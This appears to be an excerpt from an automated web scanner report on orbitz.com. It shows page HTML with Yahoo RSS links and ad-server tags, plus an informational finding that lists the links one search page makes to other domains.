<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Boston/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/BOS.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Seattle/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/WA/Seattle.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Seattle/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/SEA.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Washington DC/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/DC/WashingtonDC.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Washington DC/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/IAD.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Atlanta/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/ATL.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Atlanta/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/ATL.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Baltimore/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/BWI.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Baltimore/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/BWI.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Boston/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/BOS.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Boston/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/BOS.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Charlotte/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/CLT.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Charlotte/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/CLT.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Chicago/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/CHI.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Columbus/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/CMH.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Columbus/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/CMH.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Dallas/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/DAL.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Denver/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/DEN.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Denver/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/DEN.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Detroit/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/DTT.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Fort Lauderdale/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/FLL.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Fort Lauderdale/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/FLL.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Houston/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/HOU.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Houston/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/HOU.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Indianapolis/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/IND.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Indianapolis/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/IND.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Kansas City/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/MKC.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Las Vegas/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/LAS.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Las Vegas/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/LAS.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Los Angeles/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/LAX.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Los Angeles/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/LAX.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Miami/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/MIA.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Miami/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/MIA.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Minneapolis/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/MSP.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Minneapolis/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/MSP.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Newark/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/EWR.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Newark/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/EWR.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Orlando/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/ORL.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Philadelphia/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/PHL.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Philadelphia/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/PHL.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Phoenix/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/PHX.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Phoenix/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/PHX.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Pittsburgh/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/PIT.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Pittsburgh/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/PIT.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Portland/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/PDX.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Portland/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/PDX.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Raleigh/Durham/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/RDU.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Raleigh/Durham/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/RDU.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Salt Lake City/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/SLC.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Salt Lake City/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/SLC.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/San Diego/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/SAN.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/San Diego/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/SAN.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/San Jose/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/SJC.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/San Jose/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/SJC.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Seattle/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/SEA.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Seattle/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/SEA.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Tampa/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/TPA.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Tampa/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/TPA.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Washington DC/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/WAS.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<p>First, you'll need an RSS reader. Some readers, like <a href="http://www.pluck.com" target="_blank">Pluck</a> and
           <a href="http://sage.mozdev.org" target="_blank">Sage</a>, can be installed on your desktop to work with your Web browser.
           Others, like <a href="http://www.newsgator.com/consumer.aspx" target="_blank">Newsgator</a>,
           <a href="http://www.bloglines.com" target="_blank">Bloglines</a>, and
           <a href="http://www.google.com/reader" target="_blank">Google Reader</a>, are Web-based readers, so you don't have to download
           anything. Some popular Web portals like <a href="http://my.yahoo.com" target="_blank">My Yahoo!</a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
</html>
<iframe allowtransparency="true" height="1" width="1" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&" height="1" width="1" border="0"></a>
...[SNIP]...

17.360. http://www.orbitz.com/App/ViewRoundTripSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRoundTripSearch

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/ViewRoundTripSearch?retrieveParams=true&searchMethodHidden=expand&expandSearchOptions=true&z=2ec0&r=j#

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&
